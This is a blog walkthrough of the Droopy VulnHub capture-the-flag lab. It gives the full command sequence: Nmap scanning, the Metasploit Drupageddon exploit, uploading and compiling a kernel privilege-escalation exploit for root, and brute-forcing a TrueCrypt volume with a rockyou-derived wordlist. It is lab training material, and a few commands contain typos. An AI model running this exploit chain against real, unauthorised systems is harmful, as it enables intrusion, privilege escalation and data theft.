techyrick

CTF Challenges VulnHub

Droopy CTF Walkthrough Full tutorial | Vulnhub

By moulik #CTF
droopy ctf

Introduction

In this post, You will learn how to CTF the Droopy this is a really very easy challenge stick till the end and I am sure you will be able to crack the box.

Have any doubt leave your question on the discord server.

To download droopy [Cllick here]

Video

Aim

There is 1 flag in Droopy and we have to find it.

Hacking Phases in Droopy CTF

  • Finding target IP
  • Network Scanning (Nmap)
  • Identifies Drupal CMS
  • Exploiting Drupal CMs (Metasploit)
  • Privilege Escalation with Kernel Exploit
  • Uploading and Downloading dave.tc from /www/html
  • Generate a Dictionary with the help of rockyou.txt
  • Brute Force attack on Truecrypt Volume (Truecrack)
  • Decrypting File (Veracrypt)
  • Capture the Flag

Finding target IP

To find the target IP just enter arp-scan -l or enter netdiscover command.

Nmap scan

Doing a full port scan and os and service scan.

nmap -p- -A 192.168.1.4

Found that port 80 is open and I just opened the web browser to view the target.

Identifies Drupal CMS

Head to the target website to have a look at it.

http://192.168.1.4

The website is powered by Drupal and there is an available exploit for drupal cms.

Exploiting Drupal CMs (Metasploit)

Open msfconsole

use exploit/multi/http/drupal_drupageddon
set rhost 192.168.1.4
exploit

Wait for the Meterpreter shell to open.

Privilege Escalation with Kernel Exploit

Open another terminal and type searchsploit 3.13.0

Copy this path to home directory /usr/share/exploitdb/exploits/Linux/local/37292.c

Once you saved it go back to Meterpreter shell and type.

cd /tmp

upload /home/osboxes/37292.c

Once the exploit is uploaded enter.

shell

python -c ‘import pty;pty.spawn(“/bin/bash”)’

gcc 37292.c -o shell

chmod 777 shell

./shell to execute the exploit

id

cd /root

ls

cp dave.tc /var/www/html

Uploading and Downloading dave.tc from /www/html

Now open a web browser and enter the target IP and this URL.

http://192.168.1.4/dave.tc

Now save the file dave.tc

cd /var

ls

cd mail

ls

cd www-data

l^?

cat www-data

Generate a Dictionary with the help of rockyou.txt

Generating dictionary list to crack the dave.tc file and the flag is hidden inside dave.tc

cat rockyou.txt | grep academy > /root/Desktop/dict.txt

Brute Force attack on Truecrypt Volume (Truecrack)

To crack the password

truecrack –truecrypt /home/osboxes/Downloads/dave.tc -k SHA512 -w paas.tx

The password is etonacademy for dave.tc file

Decrypting File (Veracrypt)

To decrypt the file we are using veracrypt.

Once the file is decrypted. Open the file in a terminal.

Capture the Flag

ls -la

cd .secret

ls -la

cd .top

ls -la

cat flag.txt

By moulik

Related Post

CTF Challenges PicoCTF

Scan Surprise | PicoCTF 2024

moulik
CTF Challenges PicoCTF

Verify | Pico CTF 2024

moulik
CTF Challenges HTB

Evilcups Writeup | HTB

moulik

You Missed

CTF Challenges PicoCTF

Scan Surprise | PicoCTF 2024

CTF Challenges PicoCTF

Verify | Pico CTF 2024

Others

Deep-HLR: Advanced Phone Number Intelligence for Cybersecurity and OSINT

Bug Bounty Writeups Others

Hacking Vending Machines | Ethical Exploration of IoT Vulnerabilities